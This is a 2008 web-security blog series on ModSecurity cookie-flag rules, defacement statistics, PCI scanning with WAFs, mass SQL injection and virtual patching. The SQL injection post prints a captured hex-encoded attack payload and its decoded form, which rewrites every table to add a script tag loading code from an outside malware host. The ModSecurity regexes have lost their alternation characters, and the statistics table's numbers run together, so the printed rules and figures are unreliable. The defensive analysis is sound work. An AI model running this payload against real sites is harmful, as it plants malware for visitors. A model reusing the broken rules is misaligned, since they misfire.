Monday, December 22, 2008

Fixing Both Missing HTTPOnly and Secure Cookie Flags

Submitted by Ryan Barnett 12/22/2008

In a previous post I showed how you can use both ModSecurity and Apache together to identify/modify SessionIDs that are missing the HTTPOnly flag. I received some feedback where people were asking how to accomplish the same thing but for the "Secure" cookie flag which instructs the browser to *only* send the SessionID back over an SSL connection.
If you are only interested in addressing the missing "Secure" cookie flag, then you can simply take the example from the previous post and edit it slightly to swap out "httponly" with "secure". If, however, you want to try and address both of these issues together, then you will need to change the rule set approach a bit so that it works correctly. This is because there are now three different scenarios you have to account for -
  • Missing HTTPOnly flag
  • Missing Secure flag (if the SessionID is being sent over an SSL connection)
  • Missing both HTTPOnly and Secure flags

With this in mind, here is an updated rule set that will handle both missing HTTPOnly and Secure cooking flags.

#
# First we want to capture Set-Cookie SessionID data for later
inspection
SecRule RESPONSE_HEADERS:/Set-Cookie2?/
"(?i:(j?sessionid(php)?sessid(aspjservjw)?session[-_]?(id)?cf(idtoken)sid))"
"phase:3,t:none,pass,nolog,setvar:tx.sessionid=%{matched_var}"

#
# We now check the saved SessionID data for the HTTPOnly flag and set an Apache
# ENV variable if it is missing.
SecRule TX:SESSIONID "!(?i:\;?
?httponly;?)"
"phase:3,t:none,setenv:httponly_cookie=%{matched_var},pass,log,auditlog,msg:'AppDefect:
Missing HttpOnly Cookie Flag.'"

#
# Next we check the saved SessionID data for the Secure flag (if this is an SSL session)
# and set an Apache ENV variable if it is missing.
SecRule SERVER_PORT "@streq 443"
"chain,phase:3,t:none,pass,log,auditlog,msg:'AppDefect: Missing Secure Cookie
Flag.'"
SecRule TX:SESSIONID "!(?i:\;? ?secure;?)"
"t:none,setenv:secure_cookie=%{matched_var}"

#
# The final check is to see if BOTH of the HTTPOnly and Secure cookie flags are missing
# and set an Apache ENV variable if they are missing.
SecRule TX:SESSIONID
"!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,log,auditlog,msg:'AppDefect:
Missing HttpOnly and Secure Cookie Flag.'"
SecRule SERVER_PORT "@streq
443" "chain,t:none"
SecRule TX:SESSIONID "!(?i:\;? ?secure;?)"
"t:none,setenv:secure_httponly_cookie=%{matched_var}"

#
# This last section executes the Apache Header command to
# add the appropriate Cookie flags
Header set Set-Cookie "%{httponly_cookie}e; HTTPOnly"
env=httponly_cookie
Header set Set-Cookie "%{secure_cookie}e; Secure"
env=secure_cookie
Header set Set-Cookie "%{secure_httponly_cookie}e; Secure;
HTTPOnly" env=secure_httponly_cookie

These rules will both alert and fix these cookie issues. You may want to switch the actions to "nolog" so that you are not flooded with alerts.

Friday, December 19, 2008

Helping Protect Cookies with HTTPOnly Flag

Submitted by Ryan Barnett 12/19/2008

If you are unfamiliar with what the HTTPOnly cookie flag is or why your web apps should use it, please refer to the following resources -

The bottom line is this - while this cookie option flag does absolutely nothing to prevent XSS attacks, it does significanly help to prevent the #1 XSS attack goal which is stealing SessionIDs. While HTTPOnly is not a "silver bullet" by any means, the potential ROI of implement it is quite large. Notice I said "potential" as in order to provide the intended protections, two key players have to work together -

  • Web Applications - whose job it is to append the "HTTPOnly" flag onto all Set-Cookie response headers for SessionIDs, and
  • Web Browsers - whose job it is to identify and enforce the security restrictions on the cookie data so that javascript can not access the contents.

The current challenges to realizing the security benefit of the HTTPOnly flag is that universal adoption in both web apps and browsers is still not there yet. For example, depending on your web app platform, you may not have an easy mechanism to implementing this feature. For example - in Java you could following the example provided here on the OWASP site - http://www.owasp.org/index.php/HTTPOnly#Using_Java_to_Set_HTTPOnly, however this doesn't work well for the JSESSIONID as it is added by the framework. Jim Manico has been fighting the good fight to try and get Apache Tomcat developers to implement his patch to add in HTTPOnly support - http://manicode.blogspot.com/2008/08/httponly-in-tomcat-almost.html. The point is that with so many different web app development platforms, it isn't going to be easy to find support for this within every web app that you have to secure...

As for browsers - they too have sporadic, non-consistent adoption of HTTPOnly. It was for this reason that the OWASP Intrinsic Security group has started an RFC Spec for HTTPOnly - http://groups.google.com/group/ietf-httponly-wg. Hopefully this group will get some traction with the various browser developers.

So, at this point you might be asking yourself - Ryan, that is interesting news and all, but what can a web application firewall do to help with this issue? I would then in turn reply - Great question, I am glad that you asked. ;)

One of my pet peevs with the web application security space is the stigma that is associated with a WAF. Most everyone only focuses in on the negative security and blocking of attacks aspects of the typical WAF deployment and they fail to realize that WAFs are a highly specialized tool for HTTP. Depending on your circumstances, you may not ever intend to do blocking. There are many other use-cases for WAFs and how they can help, in this case as a tactical response tool to help address an underlying vulnerability In this case, we could monitor when back-end/protected web applications are handing out SessionIDs that are missing the HTTPOnly flag. This could raise an alert that would notify the proper personnel that they should see if editing the web language code is possible to add this feature in. A rule to do this with ModSecurity would look like this -

# Identifies SessiondIDs without HTTPOnly flag
#
SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,log,auditlog,msg:'AppDefect: Missing HttpOnly Cookie Flag.'"
SecRule MATCHED_VAR "(?i:(j?sessionid(php)?sessid(aspjservjw)?session[-_]?(id)?cf(idtoken)sid))" "t:none"

While this rule is pretty useful for identifying and alerting of the issue, many organizations would like to take the next step and try and fix the issue. If the web application does not have a way to add in the HTTPOnly cookie flag option internally, you can actually leverage ModSecurity+Apache for this purpose. ModSecurity has the ability to set environmental data that Apache reads/acts upon. In this case, we can modify our previous rule slightly to use the "setenv" action and then we add an additional Apache "header" directive that will actually overwrite the data with new Set-Cookie data that includes the HTTPOnly flag -

# Identifies SessiondIDs without HTTPOnly flag and sets the "http_cookie" ENV
# Token for Apache to read
SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,nolog"
SecRule MATCHED_VAR "(?i:(j?sessionid(php)?sessid(aspjservjw)?session[-_]?(id)?cf(idtoken)sid))" "t:none,setenv:http_cookie=%{matched_var}"

# Now we use the Apache Header directive to set the new data
Header set Set-Cookie "%{http_cookie}e; HTTPOnly" env=http_cookie

The end result of this ruleset is that ModSecurity+Apache can transparently add on the HTTPOnly cookie flag on the fly to any Set-Cookie data that you define. Thanks goes to Brian Rectanus from Breach for working with me to get the Header directive syntax correct.

Hopefully the data presented here will help people who would like to have the security benefit of this flag however are running into challenges with implementing it within the app.

Friday, August 29, 2008

Lessons Learned from Zone-H Statistics Reports

Submitted by Ryan Barnett 8/29/2008

I may be in the minority by stating the following, however, I believe that web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in websites. Defacement statistics are valuable as they are one of the few incidents that are publicly facing and thus can not easily be swept under the rug.

The reason why I feel in the minority with this concept is that most people focus too much on the impact or outcome of these attacks (the defacement) rather than the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard Risk equation -
RISK = THREAT x VULNERABILITY x IMPACT


The resulting risk of a web defacement might be low because the the impact may not be deemed a high enough severity for particular organizations. What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decided to not simply alter some homepage content and instead decided to do something more damaging? This is exactly what I believe is starting to happen. More on that later.

Zone-H Statistics Report for 2005-2007
Zone-H is a clearing house that has been tracking web defacements for a number of years. In March of 2008, they released a statistics report which correlated data from a 3 year window - 2005 - 2007. This report revealed some very interesting numbers.

What Attacks Were Being Used?
The first piece of data that was interesting to me was the table which listed the various attacks that were successfully employed which resulted in enough system access to alter the web site content.

Attack Method Total 2005 Total 2006 Total 2007
Attack against the administrator/user (password stealing/sniffing)
48.006207.323141.660
Shares misconfiguration 39.02036.52967.437
File Inclusion 118.395148.08261.011
SQL Injection
36.25347.21235.407
Access credentials through Man In the Middle attack 20.42721.20928.046
Other Web Application bug 50.3836.52918.048
FTP Server intrusion 58.94555.61117.023
Web Server intrusion 38.97530.05913.405
DNS attack through cache poisoning 7.5419.1319.747
Other Server intrusion 1.473216.0508.050
DNS attack through social engineering 4.7195.9597.585
URL Poisoning 2.8977.9886.931
Web Server external module intrusion 8.48717.2906.690
Remote administrative panel access through bruteforcing 2.7384.9886.607
Rerouting after attacking the Firewall 9884.3086.127
SSH Server intrusion 2.64414.7465.723
RPC Server intrusion
1.8215.7935.516
Rerouting after attacking the Router 1.5204.8675.257
Remote service password guessing
9397.0085.105
Telnet Server intrusion 1.8636.2524.753
Remote administrative panel access through password guessing 1.01444164.753
Remote administrative panel access through social engineering
78054723.127
Remote service password bruteforce 3.57640183.125
Mail Server intrusion 1.19841951.315
Not available
11.382372439.724

Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself
The first concept that was re-enforced was the fact that the majority of attack vectors had absolutely nothing at all to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH) or even DNS cache poisoning which would give the "illusion" that the real website had been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.

Lesson Learned #2 - Vulnerability Statistics Don't Directly Equate to Attack Vectors used in Compromises
There are many community projects and resources available that track web vulnerabilities such as; Bugtraq, CVE and OSVDB. These are tremendously useful tools for gaging the raw numbers of vulnerabilities that exist in public and commercial web software. Additionally, a project such as the WASC Web Application Security Statistics Project or the statistics recently released by Whitehat Security provide further information about vulnerabilities that are remotely exploitable in both public and custom code applications. All of this data helps to define both the overall attack surfaces available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what COULD be exploited however there must be a threat (attacker) and a desired outcome (such as a website defacement).

If an organization wants to prioritize which vulnerabilities they should address first, one way to do this would be to identify the actual vulnerabilities that are being exploited in real incidents. The data presented in the Zone-H reports helps to shed light on this area. Additionally, the WASC Web Hacking Incidents Database (WHID) also includes similar data however it is solely focused on web application-specifc attack vectors.


Incident by attack method


You may notice, for example, that although XSS is currently the #1 most common vulnerability present in web applications, it is not the most often used attack vector. That distinction goes to SQL Injection. This makes sense if you think about this from the attacker's perspective. Which is easier -
  • Option #1
    • Identify an XSS vulnerability within a target website
    • Send the XSS code to the site
    • Either wait for a client to access the page you have infected or alternatively try and entice someone to click on a link on another site or in an email
    • Hopefully your XSS code was able to grap the victim's session id and send it to your cookie trap url
    • You then need to quickly use that session id to try and log into the victim's account.
    • You can then try and steal sensitive info
  • Option #2
    • Identify an SQL Injection vector in the web app
    • Send various injection variants until you fine tune it
    • Extract out the customer data directly from the back-end DB table
Option #2 is obviously much easier as it cuts out the middle-man (the client) and goes directly through the web app to get to the desired data. What I am seeing in the field in working with Breach Security customers is that attackers are focusing more and more on criminal activities that in some way, shape or form will help them to get money. As Rod Tidwell so eloquently put it in the movie Jerry Maquire - Show Me The Money!

Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code
In keeping with the monetary theme from the previous section, another interesting trend is emerging with regards to web defacements. In all of the previous Zone-H reports, there was always a steady increase in the number of yearly defacements averaging ~30%/year. In 2007, however, they noticed a significant 37% decrease going from 752,361 in 2006 to 480,905. Obviously the number of targets is not going down and the overall state of web application security is pretty poor, so what could account for the decrease in numbers?

It is my estimation that the professional criminal elements of cyberspace (Russian Business Network, etc...) have recruited web defacers into doing "contract" work. Essentially the web defacers already have access to systems so they have a service to offer. It used to be that the web site data itself was the only thing of value, however, now we are seeing that using legitimate websites as a malware hosting platform is providing massive scale improvements for infecting users. So, instead of overtly altering website content and proclaim their 3l33t hzx0r ski77z to the world, they are rather quitely adding malicious javascript code to the sites and are making money from criminal organizations and/or malware advertisers by infecting home computer users.

Take a look at the following chart from the WHID Report -

Attack Goal

%

Stealing Sensitive Information

42%

Defacement

23%

Planting Malware

15%

Unknown

8%

Deceit

3%

Blackmail

3%

Link Spam

3%

Worm

1%

Phishing

1%

Information Warfare

1%




Incident by outcome

You can see that Defacements account for 23% while Planting Malware is right behind it at 15%. It is my opinion that the majority of people who are executing defacements will continue to migrate over and start installing malware in order to make money. This is one of the only plausible explanations that I have to account for the dramatic decrease in the number of defacements.

What is somewhat humorous about this trend is that I actually mentioned the concept of defacers making "non-apparent" changes to site content in my Preventing Web Site Defacements presentation way back in 2000. Looks like I was about 8 years ahead of the curve on that one :)

Wednesday, August 27, 2008

More PCI Confusion: How Should WAFs Handle ASV Traffic?

Submitted by Ryan Barnett 8/27/2008

I have previously discussed the importance of sharing data between code reviews, vulnerability scanning and web applications firewalls. The main issue being that these three processes/tools are usually run by three different business units - development, information security and operations staff - and they don't all share their output data with each other. The issue of sharing output data, however, is putting the cart before the horse. When looking at vulnerability scanning, you need to first decide what the goal of scanning is and then you can select the appropriate WAF configuration for handling the traffic.

What is the ASV Scanning Goal?
There seems to be two different goals that ASVs may have for scanning; 1) To identify all vulnerabilities within a target web application, or 2) To identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker. You may want to read that again to make sure that you understand the difference as this is the point that I will be discussing for the remainder of this post.

Identifying Underlying Vulnerabilities
This is a critical goal to have when scanning. If you can identify all of the existing vulnerabilities, or at least those which can be identified by scanning, you can then formulate a remediation plan to address the issue at the root cause. Remediation should include both source code fixes and custom rules within a WAF for protection in the interim.

WAF Event Management
From a WAF administration perspective, it is important to have proper configuration so as to allow for the vulnerability scanning goal while simultaneously not flooding the alert interfaces with thousands of events from ASV traffic. This data may impact both the overall performance of the WAF and it may skew reporting outputs that include raw attack data.

Option #1 - Whitelist the ASV Network Range
In order to identify all of the actual vulnerabilities, you will need to allow the ASV to interact completely with the back-end web application.

Pro(s)
  • Identification of vulnerabilities and information leakages within the web application
  • From a WAF event management perspective, this configuration will eliminate alerts generated by the scans
Con(s)
  • Reduces the true accuracy of the scans as it does not simulate what a “normal” attacker would be able to access since the WAF is not blocking inbound attacks and outbound information leakages such as SQL Injection error messages which attackers use to fine tune their attacks.
  • PCI QSAs may interpret these scan results in a negative way if the WAF blocking aspect is not considered as a compensating control in Requirement 6.6.
Option #2 - Treat ASV Traffic Like Any Other Client
Pro(s)
  • Gives a truer picture of what an attacker would/wouldn’t be able to exploit since the WAF is providing its normal protections.
Cons(s)
  • Vulnerabilities within the web application may not be identified and therefore are not being remediated through other means.
  • This configuration will generate tons of alerts especially if the scan frequency is high (daily).
Option #3 - Run Before and After Scans
If you coordinate with your ASV, you could conduct 2 different scans – one when the ASV range is whitelisted and one without.

Pro(s)
  • It allows for the identification of vulnerabilities.
  • This is advantageous as it shows the immediate ROI of a WAF as a compensating control for PCI.
Con(s)
  • It is important to note and be aware that if you take this approach that you need to make sure that your QSA knows and does NOT only look at the whitelisted scan data.
Option #4 - Use a Block but Don't Log Configuration for ASVs
One other option you might want to consider and is a “Block but don’t log” configuration which is a hybrid approach that is suitable for day to day use. With this setup, you allow the WAF to block requests/responses when it sees attacks but it will then inspect the IP address range and if it is coming from an ASV it will not generate alerts. To me, this the best approach for day to day scanning as anything that pops up in the ASV scan reports is something that the WAF did not block and should be addressed.

Some ASVs Arguing that a WAF Shouldn't Ever Block Them
I have run into an interesting webappsec scenario while presenting on PCI at conferences (such as the recent SANS What Works in Web Application Security Summit in Vegas). The attendees have started complaining that many ASVs are requiring that organizations only use the whitelist approach so that the vulnerability scans will pass directly through the WAF and interact with the back-end web application unencumbered. The ASVs are citing the following section in the PCI Security Scanning Procedures document -

13. Arrangements must be made to configure the intrusion detection system/intrusion prevention system (IDS/IPS) to accept the originating IP address of the ASV. If this is not possible, the scan should be originated in a location that prevents IDS/IPS interference

Obviously, these ASVs are lumping WAFs in with network IDS/IPS devices in this context. In reading this section, it seems to me that the real intent of this setting is that organizations should not "cheat" and configure these devices to automatically block or disrupt (with TCP Resets) connections coming from the ASV range based SOLELY on the IP address. This would not allow the scanning to inspect the site at all. Basically you can not blacklist the ASV IP range. This makes sense as this configuration would make the vulnerability scan reports come up clean but it would not be a realistic picture of what a real attacker would be able to access.

What About VA + WAF Integration?

What is frustrating with this whitelisting hard line stance is that this approach effectively negates the valuable Vulnerability Assessment + WAF Integration efforts that have recently appeared - most notably between Breach and Whitehat Security. If a WAF is not allowed to block requests coming from an ASV, then how are the ASV reports ever going to show that the issues has been remediated by a virtual patch?

Look at the following sections for PCI Requirement 11.2

11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).

Note: Quarterly external vulnerability scans must be performed by a scan vendor qualified by the payment card industry. Scans conducted after network changes may be performed by the company’s internal staff.

11.2.a Inspect output from the most recent four quarters of network, host, and application vulnerability scans to verify that periodic security testing of the devices within the cardholder environment occurs.

Verify that the scan process includes rescans until “clean” results are obtained


11.2.b To verify that external scanning is occurring on a quarterly basis in accordance with the PCI Security Scanning Procedures, inspect output from the four most recent quarters of external vulnerability scans to verify that

• Four quarterly scans occurred in the most recent 12-month period

The results of each scan satisfy the PCI Security Scanning Procedures (for example, no urgent, critical, or high vulnerabilities)

• The scans were completed by a vendor approved to perform the PCI Security Scanning Procedures

Notice the bolded sections. The problems that the organizations are encountering is that if they do indeed whitelist the ASV IP addresses, then the resulting scan reports will show vulnerabilities that a real attacker would most likely not be able to exploit because the WAF would be in blocking mode for them or they have implemented a virtual patch. So, if a QSA looks at the ASV scans and sees a bunch of urgent/critical/high vulns (SQL Injection, XSS, etc…) then the organization may fail this section. :(

Clarifications Needed

I believe that the PCI Security Counsel needs to update the text in the ASV Scanning Procedures guide to make it more clear how WAFs should be configured in relation to PCI scanning. As the very least, they should clarify the original intent of that text (as I stated previously I believe it was to prevent sites from blacklisting the ASV address ranges).

I am interested in hearing peoples experiences with this situation. What have ASVs told you? How do you configure your WAFs to handle ASV traffic?

Tuesday, August 26, 2008

Mass SQL Injection Attacks Now Targeting PHP Sites

Submitted by Ryan Barnett 8/26/2008

As most of you already have heard, or have faced yourselves, the mass SQL Injection attacks are still going strong on the web - Mass SQL Attack a Wake-up Call for Developers.

The Game Has Changed
Previously criminals had a tough time creating scripts that would mass exploit web applications. This was mainly due to website running custom coded apps. No two sites were the same. This means that attackers didn’t have access to the target code so they were forced to conduct manual reconnaissance probes to enumerate database structures (such as in the previous real attack). This meant that if an attacker wanted to extract out customer credit card data from a back-end database, they would be forced to run reconnaissance probes in order to enumerate the database structure and naming conventions. This manual probing offered defenders time to identify and react to attacks before successful compromise of customer data.

Now, these SQL Injection scripts can generically inject data into any vulnerable sites without prior knowledge of the database structure. They accomplish this by using multiple sql commands to essentially create a script that will generically gather then loop through all table names and append on some malicious javascript that points to malware on a 3rd party site.

A "skeleton key" attack if you will. Brutal...

The attacks have mainly been targeting IIS/ASP/MS-SQL sites up to this point. For example, I recently received this example attack log from a ModSecurity user which shows the SQL Injection payload -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20
VARCHAR(4000);SET%20@S=CAST(0x4445434c41524520405420
5641524348415228323535292c4043205641524348415228323535
29204445434c415245205461626c655f437572736f722043555253
4f5220464f522053454c45435420612e6e616d652c622e6e616d652
046524f4d207379736f626a6563747320612c737973636f6c756d6
e73206220574845524520612e69643d622e696420414e4420612e
78747970653d27752720414e442028622e78747970653d393920
4f5220622e78747970653d3335204f5220622e78747970653d323
331204f5220622e78747970653d31363729204f50454e205461626
c655f437572736f72204645544348204e4558542046524f4d20546
1626c655f437572736f7220494e544f2040542c4043205748494c4
528404046455443485f5354415455533d302920424547494e20455
845432827555044415445205b272b40542b275d20534554205b27
2b40432b275d3d525452494d28434f4e56455254285641524348415
22834303030292c5b272b40432b275d29292b27273c7363726970
74207372633d73646f2e313030306d672e636e2f63737273732f77
2e6a733e3c2f7363726970743e27272729204645544348204e4558
542046524f4d205461626c655f437572736f7220494e544f2040542
c404320454e4420434c4f5345205461626c655f437572736f722044
45414c4c4f43415445205461626c655f437572736f7220%20AS%20
VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
If we decode the HEX encoded SQL data, we get this -
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Fortunately for this user, ModSecurity has rules that easily detected and blocked this attack.

The theory is that the SQL injection code could be updated to compromise other platforms such as PHP, etc... Well, I have been doing some research and I am finding evidence of PHP sites that have been infected. For example, if you do a google search looking for PHP sites that have the same javascript code as the example that was sent to me, you will see approximately 3,150 site PHP sites are currectly infected.
Technical Sidenote - what is interesting with these PHP sites is that even though their web applications are not filtering client input and their DB queries are not secure, they are actually able to prevent the goal of this attack since the PHP code is properly html encoding the output sent to the clients :)
What I am not sure of is whether then attack code itself has indeed changed (to target other back-end DBs) or if the victim site is using a PHP front-end with a MS-SQL back-end… If you have any logs of these attacks where they are targeting PHP pages (instead of ASP/ASPX), please share them with me or post them here.

Monday, August 25, 2008

On Your Marks, Get Set, Go: Vulnerability Mitigation Race

Submitted by Ryan Barnett 8/25/2008

Now that the 2008 Olympics have drawn to a close, I wanted to post this entry as the track and field events inspired this analogy.

In many ways vulnerability remediation is like a Track and Field race and the firing of the starters pistol is the public vulnerability announcement. The goal of the race is to be the first one to either exploit or patch a vulnerability. The participants in the race may include;

1) Organizations running the vulnerable application,

2) Attackers looking to exploit the vulnerabilty manually

3) The odds on favorite to win the race - an automated worm program.

Oraganizations looking to mitigate or patch their systems are the long-shots to win this race. Let's look at a breakdown of the challenges that organizations face:

Not Hearing the Starter's Pistol

Unfortunately, many organizations don't realize that they are even in a race! This can be attributed poor monitoring of vulnerability alerts. If you aren't signed up on your Vendor's mail-list or you don't have someone checking out US-CERT or the SANS Internet Storm Center (ISC) daily then you are immediately giving the attackers a 50 yard lead in this race...

What Do You Mean We Don't Have The Baton?

If you are running in a relay race, you need to have a baton to pass to each memeber of your team. In this case, the baton is the vendor's security patch. You might be ready, willing and able to start the patching process, however if the vendor doesn't release the patch, you can't really start the race then can you?

Not Getting A Clean Handoff

Each leg of the relay could be though of as a step in the patching process such as installation on a test host, then pushing the patch out to development, then regression testing and finally out to production. As each phase completes its tasks, it then needs to notify the next group and "hand off the baton" so they can move forward with testing. If this doesn't happen, then the patch will never make it to the finish line - which is when the patches are applied to production hosts. I can't tell you how many times I have seen customers who have patches that make through one or two phases but then just seem to fall off the priority list.

Getting Disqualified

In a relay race, if you step outsite of your lane, then can be disqualified. Similarly, if a security patch ever causes any sort of disruption to normal service then the patch is usually not applied. If there are problems during regression testing, then odds are that the security patch will not make it to the finish line. In the end, functionality will always trump security.

Let's Not Pull A Hamstring

Many organizations want to minimize being disqualified so they take a rather slow, methodical approach to the race and decide just to walk it. These are the organizations who only have quarterly downtime for patching. These companies may get a ribbon for participation but they will never win the race.

Don't Have A Lane To Run In

What happens if you are not able to apply any patches at all to your web application? Two valid scenarios may be companies who have outsourced the development of their web application and/or who are using an older version of a COTS product where the vendor is no longer providing patches. What options are left for these companies to compete in this race?

Evening The Odds

So, where does that leave us then? Is there anything that organizations can do the even the playing field in this race? The answer is yes. Virtual Patching can help by providing immediate mitigations to the vulnerability. If an organization were to implement a Virtual Patch on a web application firewall, this will act as a stop-gap measure to prevent remote exploitation of the vulnerability until the actual patch is applied. Using the relay race analogy again, this would be like forcing the attackers to run a steeplechase type of race where there are water pits and 10 ft. tall hurdles in their lane while you are allowed to run a normal race without any obstacles. In this type of scenario, you have a much better chance of beating the attackers to the finish line and protecting your web applications.

Wednesday, August 6, 2008

Microsoft and Oracle Helping "Time-to-Fix" Problems

Submitted by Ryan Barnett 8/6/2008

Before I talk to the title of this post, I have to provide a little back story. I have had an ongoing DRAFT blog post whose subject was basically a rant against many vendors who were unwilling to offer vulnerability details. Every now and then I would review and update it a bit, but I never got to the point of actually posting it. I figured it wouldn't do much good in the grand scheme of things and the mere act of updating it provided adequate cathartic relief that a public post was not required. There has been some recent developments, however that has allowed me to dust off my post and to put a "kudos" spin on it :)

I have long been a proponent of providing options for people to mitigate identified vulnerabilities. We all realize that the traditional software patching process takes way too long to complete and push out into production when considering that the time it takes for the bad guys to create worm-able exploit code is usually measured in days. When you combine this with most vendor's vulnerability disclosure policies (which is essentially not to disclose any details), then it is obvious that the bad guys have a distinct advantage in this particular arms race...

Ideally, all vulnerability researchers would work with the vendor and they would jointly release details with patches and then customers would immediately implement them on production hosts. Unfortunately, reality is much different. Researchers often have their
own agendas and decided to release vulnerability details on their own. In these cases, the end users have no mitigation options provided by the vendor and are thus exposed to attacks. For those situations where the researchers and the vendor work together, then the end user at least has a fix that they can apply. The problem is that the standard time-to-fix for organizations to test and install patches is usually a couple months. So, the vendor has pushed the pig over the fence onto the customer and essentially takes a "it's now your problem now" approach.

What would be useful would be some technical details on the vulnerabilities that are addressed within the patches. Let's take a look at Oracle's
position on public disclosure. The fact that this is Oracle is irrelevant as many vendors share this same view and that is that they don't want to disclose any technical details of a vulnerability BEFORE patches are released. I really can't fault them for this stance as they want to ensure that they have patches ready. What I am focusing on here is when they have a patch set ready, they should provide enough technical details about the vulnerability so that an organization can implement some other mitigation options until the actual patches are installed. Unfortunately, the vendors position is that they didn't want to release the details as to prevent the bad guys from obtaining the info. What they are missing, however, is that both the good guys (Sourcefire, iDefense, etc...) and the bad guys are reverse engineering the vendors patches to uncover the details about the vulnerability. The only people who don't have any details are the end users.

So the point is that Pandora is already out of the box when vendors release patches. What they should do then is to give technical details for security folks to implement some defenses (for IDSs/IPSs). A great example of this is when bleeding edge/emerging threats folks would create Snort signatures so that an organization can identify if someone is attempting to exploit a flaw.

Now, the whole point of this post is to highlight that I have been fighting the good fight with many vendors to try and get them to see the light on the value of either releasing technical details on web-based vulnerabilities so that end users can create virtual patches with a web application firewall, or even better, for the vendor to release some virtual patches themselves (using the ModSecurity rules language). Well, we haven't achieved the latter one yet but we are seeing signs that both Oracle and Microsoft are starting to address the former. Specifically, Oracle/BEA recently released details about a
WebLogic plug-in for Apache and in the mitigation section they actually mentioned the use of ModSecurity to address the problem! That is a huge step and something that I am extremely excited about. Then just within the last week we saw the announcement of Microsoft's Active Protections Program (MAPP). Here is the short overview -

The Microsoft Active Protections Program (MAPP) is a new program that will provide vulnerability information to security software providers in advance of Microsoft Corp.’s monthly security update release. By receiving vulnerability information earlier, security software providers can give customers potential improvements to provide security protection features, such as third-party intrusion detection systems, intrusion prevention systems or security software signatures.
This is certainly an interesting initiative and may help organizations to receive more timely mitigation options to help protect themselves until the official patches are deployed.

Overall, I have have say GREAT job Oracle and Microsoft for truly helping your customers to close their time-to-fix windows.

Friday, June 6, 2008

Integrating Vulnerability Scanners and Web Application Firewalls

Submitted by Ryan Barnett 6/6/2008

In case you missed it, Breach Security has teamed up with WhiteHat Security so that their Sentinel scanning service will automatically create custom ModSecurity rules for certain classes of vulnerabilities that they find in your web applications. This works with both open source ModSecurity installations and with the commercial M1100 appliance. If your initial reaction to this is not "Wow, that is cool!" then you probably have never been in the operational security position of having to protect public web applications. In order to paint a better picture of why this is a pretty slick integration, let me provide you with some background.

As I mentioned in my previous post - What's the Score of the Game - I feel that one of areas where organizations are failing, with regards to web application security, is that there is a lack of communication between the following three groups: Development teams (who are running source code reviews), InfoSec teams (who are running vulnerability scans) and Operational Security teams (who are running web application firewalls). These three teams each have unique perspectives on the vulnerabilities of the webapps and they should share their data with each other.

Speaking from my own personal experience, I used to lead an operational security team for a federal government customer. I was charged with defending the public web applications and had built some home-grown ModSecurity WAFs to allow me to implement virtual patches for identified vulnerabilities while the development teams tried to address the root causes. Unfortunately, much of my time was spent simply tracking down information about the vulnerability. Either the vulnerability scanning team did not always provide OpSec with the results or the development teams didn't want to provide details about their "Ugly Baby". So, I would get an initial statement that application X has an SQL Injection issue but with no actionable details (what host, url and parameter).

When I did track the technical information down, the next step was to analyze the details to see if it provided enough information for me to create an appropriate filter. This was hit and miss, especially if the vulnerability scans were not tuned or if the secure code review consultant didn't understand how to abstract out and explain how a remote client could exploit the issue. The point is that I spent a fair amount of time in the research phase.

When I did get enough information, I then had to create some ModSecurity rules and run through some testing to ensure that it functioned as expected and did not deny any legitimate traffic. I could then deploy the virtual patch in production in a logging-only mode until we could schedule a re-scan. At that point I could switch it into a blocking mode.

When considering the whole "Time to Fix" concept, the process I was going through was much faster then the actual source code fixing route, however it was still manually intensive and took a fair amount of time. This is where I believe that the real value of the Sentinel + ModSecurity integration shows by automatically creating these custom ModSecurity virtual patches, we are solving two big problems -


  1. Shrinking the time to fix - the process is expedited as the WAF analyst does not need to manually research, create and test the virtual patch, and
  2. Increased confidence in blocking - The virtual patch is a targeted negative security filter that will not block legitimate traffic.
One other added benefit is that many organizations do not necessarily have technical staff with the required skillset to properly create ModSecurity virtual patches. With this integration, you don't have to have a ModSecurity guru on staff to create the rules. It will very interesting as Whitehat Security starts to track the "Time to Fix" metrics of their clients and to see how the customers who have ModSecurity installed fair against those that are using traditional code change processes!

Friday, May 30, 2008

What's the Score of the Game - Part 2: Web Security Metrics

In my earlier post entitled "What's the Score of the Game?" I presented the concept that what ultimately matters with web application security is how the application performs during a "Real Game" which means when it is deployed live on the production network. Everything else that happens before that time is preparation. It is important preparation, however no one is given the Lombardi Trophy based on how hard they practiced! No, you actually have to play in and win the Super Bowl in order to obtain that hardware :) So, referencing back to the title of this post, if the production network is "where" the webappsec game is actually played, then the next logical question is "How do we keep score?"

This is where web security metrics come into play.

